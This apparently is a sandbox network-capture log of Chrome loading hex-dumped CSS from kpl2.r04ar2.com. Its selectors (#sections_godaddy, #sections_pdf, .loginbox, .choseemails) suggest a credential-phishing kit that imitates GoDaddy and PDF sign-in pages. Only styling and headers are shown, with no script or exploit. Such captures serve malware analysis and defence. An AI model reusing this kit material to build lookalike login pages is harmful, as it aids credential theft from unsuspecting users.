                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RwfesOCVF5RaPXD1VEcBWjQHgTpVaxIOmKpacWoASGT22jvLrW%2FXuSNLTXO01%2FmS%2F8vScP1E66khv5f6yPmNSiUZcaES7ybi0nxvYI4Hx22gW4YJQeNHGuxz0Y8JSA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f65455e0042e4-EWR
                                                          2024-08-27 22:11:08 UTC737INData Raw: 33 37 62 36 0d 0a 2a 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 61 64 69 6f 5d 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 61 6c 65 72 74 2c 2e 72 61 64 69 6f 20 6c 61 62 65 6c 2c 2e 72 6f 77 2e 74 69 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 23 73 65 63 74 69 6f 6e 73 2c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 2c 2e 74 61 62 6c 65 20 2e 74 61 62 6c 65 2d 63 65 6c 6c 2c 69 6d 67 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 70 64 66 68 65 61 64 65 72 20 23 70 61 67 65 4e 61 6d 65 2c 2e 72 6f 77 2e 74 69 6c 65 2c 2e 72 6f 77 2e 74 69 6c 65 3a 6e 6f 74 28 2e 6e 6f 2d 70 69 63 6b 29 3a 61 63 74 69 76 65 2c 2e
                                                          Data Ascii: 37b6*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 67 73 50 61 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 54 61 69 20 4c 65 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 59 69 20 42 61 69 74 69 22 2c 22 4d 6f 6e 67 6f 6c 69 61 6e 20 42 61 69 74 69 22 2c 22 4d 56 20 42 6f 6c 69 22 2c 22 4d 79 61 6e 6d 61 72 20 54 65 78 74 22 2c 22 43 61 6d 62 72 69 61 20 4d 61 74 68 22 7d 2e 77 65 62 73 69 74 65 73 65 63 74 69 6f 6e 73 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 77 69 64 74 68 3a 31 30 30 76 77 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 2c 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 68 65 69 67 68 74 3a 31 30 30 76 68 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64
                                                          Data Ascii: gsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy,#sections_pdf{display:flex;flex-direction:column;height:100vh}#sections_pd
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 75 73 3a 32 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 30 30 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 7b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 34 30 70 78 20 34 30 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 31 2e 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 20 6c 64 73 2d 73 70 69 6e 6e 65 72 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2d 31 2e 31 73 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 74 72
                                                          Data Ascii: us:20%;background:#000}#sections_pdf .lds-spinner div{transform-origin:40px 40px;animation:1.2s linear infinite lds-spinner}#sections_pdf .lds-spinner div:first-child{transform:rotate(0);animation-delay:-1.1s}#sections_pdf .lds-spinner div:nth-child(2){tr
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 72 6f 75 6e 64 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 39 32 29 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 61 64 65 72 62 69 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 30 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 25 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 61 6c 6c 42 6c 6f 63 6b 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 30 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 64 69 72 65
                                                          Data Ascii: round:rgba(0,0,0,.192)}#sections_pdf .loaderbig{position:absolute;width:100px;height:100px;margin-top:15%}#sections_pdf .allBlock{position:relative;margin-top:30px;margin-left:auto;margin-right:auto;width:100%;display:flex;justify-content:center;flex-dire
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 33 31 32 35 70 63 20 35 70 78 20 30 20 30 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 6c 6f 67 69 6e 62 6f 78 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 20 30 20 33 2e 37 35 70 74 20 2e 30 35 32 30 38 33 33 33 33 69 6e 7d 23 73 65 63 74 69 6f 6e 73 20 2e 6f 70 74 73 3a 68 6f 76 65 72 2c 2e 62 61 63 6b 3a 68 6f 76 65 72 2c 2e 72 6f 77 2e 74 69 6c 65 3a 6e 6f 74 28 2e 6e 6f 2d 70 69 63 6b 29 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 7d 23 73 65 63 74 69 6f 6e 73 5f
                                                          Data Ascii: gn-items:center;justify-items:center;display:flex;border-radius:.3125pc 5px 0 0}#sections_pdf .login .loginbox{border-radius:0 0 3.75pt .052083333in}#sections .opts:hover,.back:hover,.row.tile:not(.no-pick):hover{background-color:rgba(0,0,0,.1)}#sections_
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 73 65 6c 65 63 74 50 72 6f 76 69 64 65 72 20 2e 63 68 6f 73 65 65 6d 61 69 6c 73 7b 77 69 64 74 68 3a 33 36 30 70 78 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 3a 33 30 70 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 73 65 6c 65 63 74 50 72 6f 76 69 64 65 72 20 2e 63 68 6f 73 65 65 6d 61 69 6c 73 3e 73 70 61 6e 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 33 37 39 29 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 3b
                                                          Data Ascii: pdf .login .selectProvider .choseemails{width:360px;height:auto;margin:30px;display:flex}#sections_pdf .login .selectProvider .choseemails>span{color:#fff;width:100%;height:auto;margin:auto;text-align:center;background-color:rgba(0,0,0,.379);padding:15px;
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 66 6f 72 6d 7b 66 72 6f 6d 7b 6f 70 61 63 69 74 79 3a 2e 34 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 31 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 75 6e 73 65 74 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 70 72 6f 67 72 65 73 73 44 6f 74 7b 30 25 2c 32 30 25 7b 6c 65 66 74 3a 30 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65 61 73 65 2d 6f 75 74 3b 6f 70 61 63 69 74 79 3a 30 7d 32 35 25 2c 37 35 25 7b 6f 70 61 63 69 74 79 3a 31 7d 33 35 25 7b 6c 65 66 74 3a 34 35 25 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 6c 69 6e 65 61 72 7d 36 35 25 7b 6c 65 66 74 3a 36 30 25 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e
                                                          Data Ascii: form{from{opacity:.4;pointer-events:none}to{opacity:1;pointer-events:unset}}@keyframes progressDot{0%,20%{left:0;animation-timing-function:ease-out;opacity:0}25%,75%{opacity:1}35%{left:45%;animation-timing-function:linear}65%{left:60%;animation-timing-fun
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 6c 6f 61 64 69 6e 67 2d 63 6f 6e 74 61 69 6e 65 72 2e 6c 6f 61 64 69 6e 67 20 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 6e 74 68 2d 63 68 69 6c 64 28 34 29 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2e 35 73 7d 23 73 65 63 74 69 6f 6e 73 20 2e 6c 6f 61 64 69 6e 67 2d 63 6f 6e 74 61 69 6e 65 72 2e 6c 6f 61 64 69 6e 67 20 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 6e 74 68 2d 63 68 69 6c 64 28 35 29 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2e 36 35 73 7d 23 73 65 63 74 69 6f 6e 73 7b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 77 69 64 74 68 3a 31 30 30 76 77 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 2d 63 65 6c 6c 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 23 73 65 63 74 69 6f 6e 73 20 2e 73 65 63 74 69 6f 6e 63 6f 6e 74 65 6e 74 7b 70 6f
                                                          Data Ascii: loading-container.loading .dot-floating:nth-child(4){animation-delay:.5s}#sections .loading-container.loading .dot-floating:nth-child(5){animation-delay:.65s}#sections{height:100vh;width:100vw;display:table-cell;max-width:100%}#sections .sectioncontent{po
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 20 31 70 78 3b 68 65 69 67 68 74 3a 33 36 70 78 3b 6f 75 74 6c 69 6e 65 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 32 30 70 78 29 7d 2e 69 6e 70 75 74 3a 68 6f 76 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 3a 68 6f 76 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 38 29 7d 2e 69 6e 70 75 74 3a 3a 70 6c 61 63 65 68 6f 6c 64 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 7d 23 61 75 74 68 63 61 6c 6c 64 65 73 63
                                                          Data Ascii: 1px;height:36px;outline:0;border-radius:0;-webkit-border-radius:0;background-color:transparent;width:calc(100% - 20px)}.input:hover,input[type=email]:hover,input[type=tel]:hover{border-color:rgba(0,0,0,.8)}.input::placeholder{font-size:15px}#authcalldesc
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 30 7d 2e 61 6c 65 72 74 2d 65 72 72 6f 72 7b 63 6f 6c 6f 72 3a 23 65 38 31 31 32 33 7d 69 6e 70 75 74 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2b 6c 61 62 65 6c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 2e 64 69 72 6c 74 72 7b 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 7d 2e 69 6e 70 75 74 2d 6d 61 78 2d 77 69 64 74 68 7b 6d 61 78 2d 77 69 64 74 68 3a 36 34 30 70 78 7d 2e 74 61 62 6c 65 2c 69 6e 70 75 74 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 6c 61 62 65 6c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64
                                                          Data Ascii: order-bottom-left-radius:0;border-top-left-radius:0;border-left:0}.alert-error{color:#e81123}input.form-control+label.input-group-addon{border-radius:0}.dirltr{direction:ltr}.input-max-width{max-width:640px}.table,input{max-width:100%}label.input-group-ad


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          40192.168.2.449807188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:07 UTC1426OUTGET /xy7B16Rpqjcafef30 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: text/css,*/*;q=0.1
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: style
                                                          Referer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQW
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImN5ZU9uWjB5Qmc5emRSZFlYRWpOUkE9PSIsInZhbHVlIjoiZk1ybHNzQS94ZkV4SXZQVXVldmNNU1BUNlFHMmc4Q0Z1TU9uM08wNC83T28rNVJZRGJkNUtXNmhhRHJuUWRlcTlsR0Q3ZWpxZDk4YjlSRzlVSk51dHVqem5McU9yM3R1WVRtdlR6eFZKT3lGKzdSYy9LNXBRcWtYVHpJK3F5eWgiLCJtYWMiOiIwNGZkZTkxOGViNzk0OGU1NjQ0NjBiNzM2NmRkYmE3Nzk3Yzc4YzdlMDQxMTEzOGQzMWYwMzQzM2FhYTY3ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFmdmdnSE5ONjZBY0JyYjVSVlJ5bmc9PSIsInZhbHVlIjoiS3dpdDVZZEVzOHloalY5dWFqZGxvSEkrMnhRMW85dG1VUExKYjJZQURCdURlR1FRa0Yrdk5iMVJNSmx0SjdCaXFxWDJVMjF0dTdneWgySFBCSm1nWjliUXU1SG53UWp1WHdHQ3YrMVlUSjZId0tGWllVa2NsMTY0NzBhM3lHT1kiLCJtYWMiOiI0YjIxOWZhMTBkZTFhMmNlNWJlMGVhNTRjNGY1MmE2MGI4ZDJjMGI5YTM5ZGQ5ZDBkOGYxMGJkNGM3Mjc2NWY4IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:08 UTC627INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:08 GMT
                                                          Content-Type: text/css;charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Content-Disposition: inline; filename="xy7B16Rpqjcafef30"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CDeFaJRPdyXXlqAtcTyR1odjqt6p9LNsKzm4UCezvR1IrZ4SeIOBDSTc1ZyYcxgohtdzD3DuLJ%2B2fF9EUoYx69BAz9CfO1o%2BWGr3PGfDYoacq4muiSV8GiuU6bST9w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f6545592917f5-EWR
                                                          2024-08-27 22:11:08 UTC742INData Raw: 33 37 62 39 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 7b 0d 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 67 64 73 68 65 72 70 61 3b 0d 0a 7d 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 61 20 7b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 32 72 71 61 70 77 2c 23 30 30 30 29 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 37 69 66 35 70 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 37 69 66 35 70 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 7d 0d 0a 0d 0a
                                                          Data Ascii: 37b9#sections_godaddy {font-family: gdsherpa;}#sections_godaddy a { color: var(--ux-2rqapw,#000); -webkit-text-decoration: var(--ux-1f7if5p,underline); text-decoration: var(--ux-1f7if5p,underline); background-color: transparent;}
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 29 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 37 69 66 35 70 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 20 20 67 61 70 3a 20 30 2e 35 65 6d 3b 0d 0a 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0d 0a 20 20 2d 2d 75 78 2d 62 75 74 74 6f 6e 2d 69 63 6f 6e 2d 6d 61 72 67 69 6e 3a 20 63 61 6c 63 28 28 76 61 72 28 2d 2d 75 78 2d 74 33 37 39 6f 76 2c 76 61 72 28 2d 2d 75 78 2d 6a 77 35 73 39 6a 2c 31 2e 35 29 29 20 2a 20 31 65 6d 20 2d 20 31 2e 35 65 6d 29 20 2f 20 32 29 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 69 6e 68 65 72 69 74 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 67 61 70 3a 20 2e 35 65 6d 3b 0d
                                                          Data Ascii: ); -webkit-text-decoration: var(--ux-1f7if5p,underline); gap: 0.5em; cursor: pointer; --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2); font-weight: inherit; background: transparent; gap: .5em;
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 61 79 3a 20 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 0d 0a 20 20 62 6c 6f 63 6b 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 75 78 53 70 61 63 65 2d 2d 70 61 64 64 69 6e 67 2d 73 69 7a 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 73 70 61 63 65 2e 75 78 2d 73 70 61 63 65 2d 2d 62 6c 6f 63 6b 3a 6e 6f 74 28 3a 65 6d 70 74 79 29 20 7b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 62 6c 6f 63 6b 3a 20 76 61 72 28 2d 2d 75 78 53 70 61 63 65 2d 2d 70 61 64 64 69 6e 67 2d 73 69 7a 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 64 69 61 6c 6f 67 2d 73 68 65 6c 6c 20 7b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 0d 0a 20 20 67 61 70 3a 20 63 61 6c 63 28
                                                          Data Ascii: ay: inline-flex; block-size: var(--uxSpace--padding-size);}#sections_godaddy .ux-space.ux-space--block:not(:empty) { padding-block: var(--uxSpace--padding-size);}#sections_godaddy .ux-dialog-shell { display: inline-flex; gap: calc(
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 78 2d 79 34 70 67 38 7a 2c 2a 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 34 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 33 29 20 76 61 72 28 2d 2d 75 78 2d 79 34 70 67 38 7a 2c 2a 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 35 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 34 29 20 76 61 72 28 2d 2d 75 78 2d 79 34 70 67 38 7a 2c 2a 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 6c 69 6e 65 48 65 69 67 68
                                                          Data Ascii: x-y4pg8z,*) var(--ux-7s4p3v,1.125)); --uxText--fontSize4: calc(var(--uxText--fontSize3) var(--ux-y4pg8z,*) var(--ux-7s4p3v,1.125)); --uxText--fontSize5: calc(var(--uxText--fontSize4) var(--ux-y4pg8z,*) var(--ux-7s4p3v,1.125)); --uxText--lineHeigh
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 74 2d 69 6e 70 75 74 2d 73 68 65 6c 6c 20 2e 75 78 2d 74 65 78 74 2d 63 61 70 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 36 70 78 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 0d 0a 7d 0d 0a 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 66 69 65 6c 64 2d 66 72 61 6d 65 2e 75 78 2d 66 69 65 6c 64 2d 66 72 61 6d 65 2d 2d 69 6e 76 61 6c 69 64 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 44 42 31 38 30 32 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 61 6c 65 72 74 2e 75 78 2d 61 6c 65 72 74 2d 2d 63 72 69 74 69 63 61 6c 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f
                                                          Data Ascii: t-input-shell .ux-text-caption { margin-top: 6px; font-size: 13px;}#sections_godaddy .ux-field-frame.ux-field-frame--invalid { border-color: #DB1802 !important;}#sections_godaddy .ux-alert.ux-alert--critical { background-co
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 31 70 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 63 6c 69 70 3a 20 72 65 63 74 28 30 2c 30 2c 30 2c 30 29 3b 0d 0a 20 20 63 6c 69 70 3a 20 72 65 63 74 28 30 2c 30 2c 30 2c 30 29 3b 0d 0a 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 63 6c 69 70 2d 70 61 74 68 3a 20 69 6e 73 65 74 28 35 30 25 29 3b 0d 0a 20 20 63 6c 69 70 2d 70 61 74 68 3a 20 69 6e 73 65 74 28 35 30 25 29 3b 0d 0a 20 20 62 6f 72 64 65 72 3a 20 30 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 68 32 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 0d 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74
                                                          Data Ascii: 1px; padding: 0; overflow: hidden; -webkit-clip: rect(0,0,0,0); clip: rect(0,0,0,0); white-space: nowrap; -webkit-clip-path: inset(50%); clip-path: inset(50%); border: 0;}#sections_godaddy h2 { margin-top: 0; margin-bot
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 64 64 79 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 38 70 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 63 6f 6e 74 61 69 6e 65 72 3a 3a 61 66 74 65 72 20 7b 0d 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0d 0a 20 20 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 72 6f 77 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 38 70 78 3b 0d
                                                          Data Ascii: ddy .container { margin-left: auto; margin-right: auto; padding-left: 8px; padding-right: 8px;}#sections_godaddy .container::after { content: ""; display: table; clear: both;}#sections_godaddy .row { margin-left: -8px;
